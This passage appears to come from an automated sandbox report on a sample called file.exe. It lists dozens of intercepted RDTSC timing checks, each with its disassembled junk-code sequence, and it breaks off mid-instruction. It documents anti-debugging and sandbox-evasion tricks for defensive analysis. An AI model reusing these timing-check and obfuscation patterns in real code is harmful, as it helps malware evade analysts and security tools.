                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDE54 second address: FBDE5E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C14B9223Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC07A0 second address: FC07A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC07A4 second address: FC07AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC07AA second address: FC07AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC07AE second address: FC07C0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC07C0 second address: FC07C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC07C6 second address: FC07CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC07CB second address: FC07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC09CF second address: FC09DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC09DC second address: FC0A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F6C1537B64Ah 0x0000000c nop 0x0000000d pushad 0x0000000e popad 0x0000000f push 00000000h 0x00000011 jmp 00007F6C1537B64Eh 0x00000016 push 6F4C8F1Ah 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f pop edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0A0A second address: FC0A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 6F4C8F9Ah 0x0000000e jmp 00007F6C14B92242h 0x00000013 push 00000003h 0x00000015 mov edi, dword ptr [ebp+122D2DF6h] 0x0000001b push 00000000h 0x0000001d sub cx, 5809h 0x00000022 push 00000003h 0x00000024 mov edx, edi 0x00000026 push esi 0x00000027 sbb ch, 00000042h 0x0000002a pop esi 0x0000002b push AE1DAA17h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F6C14B92246h 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1FAA second address: FE1FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C1537B652h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1FC2 second address: FE1FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1FC6 second address: FE1FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE00F1 second address: FE0108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B9223Fh 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0108 second address: FE0117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 je 00007F6C1537B646h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0234 second address: FE026C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92241h 0x00000007 push ebx 0x00000008 jmp 00007F6C14B92247h 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F6C14B92238h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE026C second address: FE0285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C1537B654h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA8C8A second address: FA8CA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F6C14B92236h 0x0000000f jmp 00007F6C14B9223Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0552 second address: FE0557 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0557 second address: FE055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0807 second address: FE0845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B655h 0x00000007 jmp 00007F6C1537B656h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F6C1537B646h 0x00000017 jg 00007F6C1537B646h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0DDC second address: FE0DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F6C14B92236h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6BF2 second address: FD6BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6BF6 second address: FD6C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B92246h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C12 second address: FD6C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6C1537B659h 0x0000000e jmp 00007F6C1537B64Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C45 second address: FD6C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C14B9223Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6C55 second address: FD6C5F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C1537B646h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF9E0 second address: FAF9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF9E6 second address: FAF9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6C1537B64Ah 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF9FA second address: FAFA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE184D second address: FE185B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6C1537B646h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE1DEF second address: FE1E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F6C14B9223Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE440B second address: FE443D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C1537B653h 0x00000009 jmp 00007F6C1537B657h 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE443D second address: FE444F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F6C14B9223Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE444F second address: FE4455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1506 second address: FB150A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8ADF second address: FE8AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8FD6 second address: FE9041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F6C14B92246h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jg 00007F6C14B92249h 0x00000015 push esi 0x00000016 jmp 00007F6C14B92241h 0x0000001b pop esi 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F6C14B92246h 0x00000026 jmp 00007F6C14B92246h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA352 second address: FEA374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnc 00007F6C1537B657h 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA374 second address: FEA37A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA7F8 second address: FAA7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECCFC second address: FECD02 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECE46 second address: FECE60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F6C1537B651h 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECE60 second address: FECE70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 ja 00007F6C14B92236h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECFD4 second address: FECFDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECFDD second address: FECFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED424 second address: FED428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED428 second address: FED443 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6C14B92236h 0x00000008 jmp 00007F6C14B92241h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED443 second address: FED449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF114D second address: FF1151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF16B0 second address: FF16B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF18F5 second address: FF18F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF18F9 second address: FF18FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF18FF second address: FF1904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF20DC second address: FF20E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF20E0 second address: FF20E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2B87 second address: FF2B96 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6C1537B646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2B96 second address: FF2BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sub esi, dword ptr [ebp+122D2E9Ah] 0x0000000d push 00000000h 0x0000000f mov di, 9145h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F6C14B92238h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov si, cx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jnp 00007F6C14B92238h 0x0000003b push eax 0x0000003c pop eax 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF29C5 second address: FF29C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2BDE second address: FF2BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF29C9 second address: FF29F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C1537B656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6C1537B650h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF29F5 second address: FF2A07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2A07 second address: FF2A0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2A0C second address: FF2A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3CB3 second address: FF3CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3CB7 second address: FF3CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92240h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F6C14B9223Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF3CD7 second address: FF3CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF56E1 second address: FF56E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF56E7 second address: FF56EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF56EB second address: FF5743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C14B92246h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007F6C14B92244h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push ecx 0x00000015 push esi 0x00000016 pop esi 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop ecx 0x0000001a jmp 00007F6C14B92248h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5743 second address: FF5762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F6C1537B658h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF450B second address: FF450F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7E2A second address: FF7E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC391 second address: FFC395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC395 second address: FFC39E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC39E second address: FFC3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6C14B92236h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F6C14B9223Dh 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 xor dword ptr [ebp+1246B6EBh], ebx 0x0000001c movzx ebx, bx 0x0000001f xchg eax, esi 0x00000020 jmp 00007F6C14B92241h 0x00000025 push eax 0x00000026 pushad 0x00000027 push ecx 0x00000028 jo 00007F6C14B92236h 0x0000002e pop ecx 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF326 second address: FFF32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000426 second address: 100042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10023B7 second address: 10023F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6C1537B648h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F6C1537B657h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6C1537B654h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10023F2 second address: 1002457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F6C14B92238h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 xor dword ptr [ebp+122D30B1h], ecx 0x00000028 adc bx, 1B1Bh 0x0000002d push 00000000h 0x0000002f movsx ebx, dx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F6C14B92238h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push eax 0x0000004f js 00007F6C14B92249h 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100543B second address: 100543F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE4FC second address: FFE50E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6C14B92238h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE50E second address: FFE515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE515 second address: FFE51A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10025F7 second address: 10025FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10080BE second address: 100812D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F6C14B9223Bh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F6C14B92238h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D1F86h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F6C14B92238h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov edi, 2DFD7FCDh 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+122D1830h] 0x00000057 push eax 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b jng 00007F6C14B92236h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100357B second address: 100357F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1005566 second address: 10055F4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C14B92236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D275Dh], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b xor ebx, dword ptr [ebp+122D2E86h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D1F86h], edx 0x0000002e pushad 0x0000002f mov esi, dword ptr [ebp+12442B43h] 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp+122D06D5h] 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F6C14B92238h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov edi, dword ptr [ebp+122D2BC6h] 0x0000005c push FFFFFFFFh 0x0000005e mov edi, dword ptr [ebp+122D2B62h] 0x00000064 nop 0x00000065 jmp 